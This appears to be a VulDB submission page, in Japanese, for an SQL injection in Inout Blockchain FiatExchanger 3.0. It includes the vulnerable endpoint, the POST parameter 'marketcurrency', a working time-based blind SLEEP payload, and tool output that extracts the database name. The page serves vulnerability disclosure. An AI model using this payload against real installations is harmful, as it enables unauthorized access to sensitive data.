提出 #177560: Inout Blockchain FiatExchanger 3.0 - SQL Injection情報

タイトルInout Blockchain FiatExchanger 3.0 - SQL Injection
説明# Exploit Title: Inout Blockchain FiatExchanger 3.0 - SQL Injection # Date: 04/07/2023 # Exploit Author: CraCkEr # Vendor: Inout Scripts # Vendor Homepage: https://www.inoutscripts.com/ # Software Link: https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/ # Version: 3.0 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /index.php/coins/update_marketboxslider ---------------------------------------------- POST /index.php/coins/update_marketboxslider HTTP/2 marketcurrency=[SQLI]&displaylimit=4 ---------------------------------------------- POST parameter 'marketcurrency' is vulnerable to SQL Injection --- Parameter: marketcurrency (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: marketcurrency=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&displaylimit=4 --- [+] Starting the Attack fetching current database current database: '*****_blockchain_fiatexchanger_**' [-] Done
ユーザー
 skalvin (UID 49463)
送信2023年07月04日 17:58 (3 年 ago)
モデレーション2023年07月11日 17:26 (7 days later)
ステータス承諾済み
VulDBエントリ233577 [Nesote Inout Blockchain FiatExchanger 3.0 POST Parameter update_marketboxslider marketcurrency SQLインジェクション]
ポイント17

Do you need the next level of professionalism?

Upgrade your account now!